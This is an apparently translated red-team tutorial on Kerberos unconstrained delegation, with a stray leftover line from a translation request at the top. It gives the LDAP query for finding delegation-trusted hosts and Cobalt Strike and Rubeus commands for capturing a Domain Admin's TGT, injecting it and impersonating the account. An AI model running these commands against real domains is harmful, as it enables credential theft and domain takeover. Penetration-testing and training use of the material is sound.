Unconstrained Delegation

Here is the translation into perfect British English, maintaining the dismissive and technical tone.

---

Kerberos "delegation" is a feature that allows a principal (like a user or a computer) to request access to resources on behalf of another principal. I reckon if you are here, it is because you know something about the topic. So I am skipping the little intro chat. Okay? I couldn't care less if you think that is not okay.

How is Unconstrained Delegation Enabled?

This type of delegation is enabled by setting a flag called TRUSTED_FOR_DELEGATION in the UserAccountControl attribute of the computer object in Active Directory.

We can search for computers with this flag enabled using an LDAP filter. The value 524288 corresponds to the TRUSTED_FOR_DELEGATION flag.

beacon> ldapsearch (&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288)) --attributes samaccountname

sAMAccountName: [EXAMPLE_SERVER_1]$

sAMAccountName: [EXAMPLE_SERVER_2]$

Attaaaaack

When a client requests a service ticket (TGS-REQ) for an SPN running in the context of this computer account (for example, the HTTP service on [WEB_SERVER_1]$), the Domain Controller sees the TRUSTED_FOR_DELEGATION flag.

As a result, the DC sets a flag in the response ticket (TGS-REP) called ok-as-delegate.

This indicates to the requesting client that the server specified in the ticket is trusted for delegation. Therefore, when the client sends its authentication request (AP-REQ) to the web service, it includes both the service ticket and a full copy of the user's TGT.

The computer running the service ([EXAMPLE_SERVER_2]$) will then be able to cache the user's TGT in memory and use it to request service tickets on their behalf to any other service in the future.

Exploitation with Cobalttttt

The tool Rubeus has a monitor command that periodically captures and displays TGTs as users authenticate to the compromised service.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /nowrap

The result might look something like this:

[*] 19/02/2025 14:56:32 UTC - Found new TGT:

  User                  :  [ADMIN_USER]@[DOMAIN.COM]

  StartTime             :  19/02/2025 14:56:16

  EndTime               :  20/02/2025 00:56:16

  RenewTill             :  26/02/2025 14:56:16

  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable

  Base64EncodedTicket   :    doIFj[...snip...]kNPTQ==

This result shows that we have captured a TGT from a Domain Administrator, [ADMIN_USER]. With this ticket, the attacker can now impersonate [ADMIN_USER] anywhere in the domain.

To finish the monitoring task in Rubeus (executed via Cobalt Strike), use the jobs and jobkill commands.

beacon> jobs

[*] Jobs

 JID  PID   Description

 ---  ---   -----------

 0    2468  .NET assembly


beacon> jobkill 0

[+] job 0 completed

Afterwards, it would be as simple as injecting the captured ticket with Rubeus like this:

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[DOMAIN.COM] /username:[ADMIN_USER] /password:[EXAMPLE_PASSWORD] /ticket:[TICKET_DATA]

Then, in the case of Cobalt Strike, you have to impersonate using steal_token.

steal_token [PID]

And that is it. We have a totally valid ticket.